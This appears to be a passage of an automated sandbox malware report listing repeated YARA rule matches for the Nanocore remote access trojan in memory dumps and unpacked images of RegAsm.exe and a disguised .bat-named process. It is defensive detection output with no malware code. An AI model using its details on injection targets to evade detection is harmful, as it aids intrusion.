Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
